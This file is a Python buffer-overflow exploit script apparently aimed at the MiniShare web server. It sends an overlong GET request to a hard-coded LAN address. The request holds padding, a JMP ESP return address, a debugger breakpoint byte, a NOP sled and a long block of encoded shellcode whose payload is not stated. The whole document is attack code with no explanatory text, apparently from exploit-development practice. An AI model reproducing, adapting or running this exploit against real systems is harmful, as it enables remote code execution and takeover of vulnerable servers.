exploitMinishare2.py

import socket
socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket.connect(('192.168.1.200',80))
buffer = "GET /"
buffer += "\x41" * 1786
buffer += '\x7B\x46\x86\x7C' # 7C86467B   FFE4             JMP ESP
buffer += '\xcc'
buffer += '\x90' * 100
buffer += ("\xdb\xc3\xd9\x74\x24\xf4\x58\x2b\xc9\xbb\xc3\xd7\x07\xe6" +
"\xb1\x56\x31\x58\x18\x03\x58\x18\x83\xe8\x3f\x35\xf2\x1a" +
"\x57\x33\xfd\xe2\xa7\x24\x77\x07\x96\x76\xe3\x43\x8a\x46" +
"\x67\x01\x26\x2c\x25\xb2\xbd\x40\xe2\xb5\x76\xee\xd4\xf8" +
"\x87\xde\xd8\x57\x4b\x40\xa5\xa5\x9f\xa2\x94\x65\xd2\xa3" +
"\xd1\x98\x1c\xf1\x8a\xd7\x8e\xe6\xbf\xaa\x12\x06\x10\xa1" +
"\x2a\x70\x15\x76\xde\xca\x14\xa7\x4e\x40\x5e\x5f\xe5\x0e" +
"\x7f\x5e\x2a\x4d\x43\x29\x47\xa6\x37\xa8\x81\xf6\xb8\x9a" +
"\xed\x55\x87\x12\xe0\xa4\xcf\x95\x1a\xd3\x3b\xe6\xa7\xe4" +
"\xff\x94\x73\x60\xe2\x3f\xf0\xd2\xc6\xbe\xd5\x85\x8d\xcd" +
"\x92\xc2\xca\xd1\x25\x06\x61\xed\xae\xa9\xa6\x67\xf4\x8d" +
"\x62\x23\xaf\xac\x33\x89\x1e\xd0\x24\x75\xff\x74\x2e\x94" +
"\x14\x0e\x6d\xf1\xd9\x3d\x8e\x01\x75\x35\xfd\x33\xda\xed" +
"\x69\x78\x93\x2b\x6d\x7f\x8e\x8c\xe1\x7e\x30\xed\x28\x45" +
"\x64\xbd\x42\x6c\x04\x56\x93\x91\xd1\xf9\xc3\x3d\x89\xb9" +
"\xb3\xfd\x79\x52\xde\xf1\xa6\x42\xe1\xdb\xd1\x44\x2f\x3f" +
"\xb2\x22\x52\xbf\x25\xef\xdb\x59\x2f\x1f\x8a\xf2\xc7\xdd" +
"\xe9\xca\x70\x1d\xd8\x66\x29\x89\x54\x61\xed\xb6\x64\xa7" +
"\x5e\x1a\xcc\x20\x14\x70\xc9\x51\x2b\x5d\x79\x1b\x14\x36" +
"\xf3\x75\xd7\xa6\x04\x5c\x8f\x4b\x96\x3b\x4f\x05\x8b\x93" +
"\x18\x42\x7d\xea\xcc\x7e\x24\x44\xf2\x82\xb0\xaf\xb6\x58" +
"\x01\x31\x37\x2c\x3d\x15\x27\xe8\xbe\x11\x13\xa4\xe8\xcf" +
"\xcd\x02\x43\xbe\xa7\xdc\x38\x68\x2f\x98\x72\xab\x29\xa5" +
"\x5e\x5d\xd5\x14\x37\x18\xea\x99\xdf\xac\x93\xc7\x7f\x52" +
"\x4e\x4c\x8f\x19\xd2\xe5\x18\xc4\x87\xb7\x44\xf7\x72\xfb" +
"\x70\x74\x76\x84\x86\x64\xf3\x81\xc3\x22\xe8\xfb\x5c\xc7" +
"\x0e\xaf\x5d\xc2")

buffer +=" HTTP/1.1\r\n\r\n"
socket.send(buffer)
socket.close()